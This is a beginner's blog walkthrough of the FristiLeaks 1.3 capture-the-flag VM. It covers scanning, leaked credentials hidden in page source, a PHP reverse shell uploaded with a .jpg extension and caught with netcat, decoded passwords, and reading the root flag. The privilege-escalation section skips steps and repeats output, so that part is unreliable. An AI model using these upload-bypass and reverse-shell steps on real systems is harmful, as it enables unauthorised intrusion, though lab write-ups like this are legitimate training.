This is my first blog and my first machine “Fristileaks”
INTRODUCTION FristiLeaks
NAME: Fristileaks 1.3
AUTHOR: Ar0xA
SERIES: Fristileaks
STYLE: Enumeration/Follow the breadcrumbs
GOAL: get root (uid 0) and read the flag file
Tester(s): dqi, barrebas
Difficulty: Basic
Description:
A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers,reverse engineering,etc.VMware users will need to manually edit the VM’s MAC address to: 08:00:27:A5:A6:76
Virtual Machine:
Format: Virtual Machine (Virtualbox — OVA)
Operating System: Linux
!!Identify the IP address of FristiLeaks machine by using nmap command!!
# nmap -sn 192.168.56.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020–01–30 19:30 IST
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:62:3C:42 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.105
Host is up (0.00046s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.78 seconds
!! after knowing your machine ip you should go for ping just to check wheather it is live or not. !!
# ping 192.168.56.105
PING 192.168.56.105 (192.168.56.105) 56(84) bytes of data.
64 bytes from 192.168.56.105: icmp_seq=1 ttl=64 time=0.426 ms
64 bytes from 192.168.56.105: icmp_seq=2 ttl=64 time=0.441 ms
!!Now Identify services running on FristiLeaks machine by using nmap!!
# nmap -v -A -sT -O -p- 192.168.56.105
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32–3.10, Linux 2.6.32–3.13
Uptime guess: 0.039 days (since Thu Jan 30 19:22:15 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 164.66 ms 192.168.56.105
!!Now let see what we found in http port 80 http://192.168.56.105!!
!!Then lets check what we found in robots.txt
!!As the name of the machine is FristiLeaks we go ahead and access the /fristi — http://192.168.56.105/fristi !!
!!Now we get two field username and password on this page for more information let check a view source code for that press Ctrl+U !!
<! —
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
!!In the page’ source code there was also a comment with a possible username:!!
<! —
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
-by eezeepz
!!This is code which we have to encode by using base64 to image (https://www.base64decode.net/base64-image-decoder)!!
we have username = eezeepz
nd we find password = keKkeKKeKKeKkEkkEk
!!Then we have to upload a PHP REVERSE SHELL FILE and add extension .jpg for upload field!!
# cp php-reverse-shell.php php-reverse-shell.php.jpg
# vim php-reverse-shell.php.jpg
set_time_limit (0);
$VERSION = “1.0”;
$ip = ‘192.168.56.1’; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = ‘uname -a; w; id; /bin/sh -i’;
$daemon = 0;
$debug = 0;
:wq!
!!THEN UPLOAD THIS FILE ON http://192.168.56.105/fristi/upload.php!!
Then launch
# nc -lnvp 1234
Then go to browser
http://192.168.56.105/fristi/uploads/php-reverse-shell.php.jpg
After this we got shell
# nc -nlvp 1234
listening on [any] 1234 …
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.105] 40982
Linux localhost.localdomain 2.6.32–573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
12:26:48 up 4:04, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$ cd home
$cd home
!!here we find three user name with admin,eezeepz,fristigod!!
sh-4.1$ ls
ls
admin
eezeepz
fristigod
sh-4.1$ cd admin
cd admin
sh-4.1$ ls -alh
ls -alh
total 652K
drwxrwxrwx. 2 admin admin 4.0K Nov 19 2015 .
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 ..
-rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxrwxrwx 1 admin admin 45K Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48K Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 89K Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24K Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 160K Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 160K Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 84K Nov 18 2015 ps
-rw-r — r — 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
!!In admin folder we have two file extention with .txt we have to open it (by using cat command) in that we find crypted password.!!
sh-4.1$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
sh-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
!!After getting this cryptedpassword you have this .py file for that on ur main terminal u have to make pyhton file name with cryptpass.py !!
root@winvista:~# cat cryptpass.py
import base64,codecs,sys
def encodeString(str):
decoded = codecs.decode(str[::-1], ‘rot13’)
return base64.b64decode(decoded)
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
!!after that run this python file and encode crypted password which are given in .txt file!!
root@winvista:~# python cryptpass.py mVGZ3O3omkJLmy2pcuTq (#command#)
thisisalsopw123(#decoded password#)
root@winvista:~# python cryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG (#command#)
LetThereBeFristi!(#decoded password#)
!! From admin folder we get two password. One is for fristigod and second one is for admin!!
!! Now let go nd check wht we get from another user!!
sh-4.1$ cd eezeepz
cd eezeepz
!!There was a file called notes.txt that had some information in it!!
sh-4.1$ cat notes.txt
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don’t forget to specify the full path for each binary!
Just put a file called “runthis” in /tmp/, each line one command. The
output goes to the file “cronresult” in /tmp/. It should
run every minute with my account privileges.
- Jerry
!!Now I launched a bash shell wth a python oneliner, and I tried to login with admin but he didn’t run sudo command! Instead the fristigod user was able to run the sudo command!!
!!I needed a TTY which I get with Python:!!
sh-4.1$ python -c “import pty; pty.spawn(‘/bin/bash’)”
python -c “import pty; pty.spawn(‘/bin/bash’)”
sh-4.1$ su — fristigod
su — fristigod
Password: LetThereBeFristi!
-bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
-bash-4.1$
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Enumeration as the user fristigod revealed the SUID binary: /var/fristigod/.secret_admin_stuff/doCom.
-bash-4.1$ ls -lah
ls -lah
total 16K
drwxr-x — — 3 fristigod fristigod 4.0K Nov 25 2015 .
drwxr-xr-x. 19 root root 4.0K Nov 19 2015 ..
-rw — — — — 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .secret_admin_stuff
-bash-4.1$ ls -lah
ls -lah
total 16K
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .
drwxr-x — — 3 fristigod fristigod 4.0K Nov 25 2015 ..
-rwsr-sr-x 1 root root 7.4K Nov 25 2015 doCom
-bash-4.1$
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep=”COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS”, env_keep+=”MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE”, env_keep+=”LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES”, env_keep+=”LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE”, env_keep+=”LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY”,
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
Enumeration as the user fristigod revealed the SUID binary: /var/fristigod/.secret_admin_stuff/doCom.
ROOT FLAGS
bash-4.1$ cd /root
cd /root
-bash-4.1$ ls -lhROOT FLAGS
ls -lh
total 4.0K
-rwxrwxrwx. 1 root root 246 Nov 17 2015 fristileaks_secrets.txt
-bash-4.1$ cat fristileaks_secrets.txt
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it’s supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
Learn enjoy with fun!!
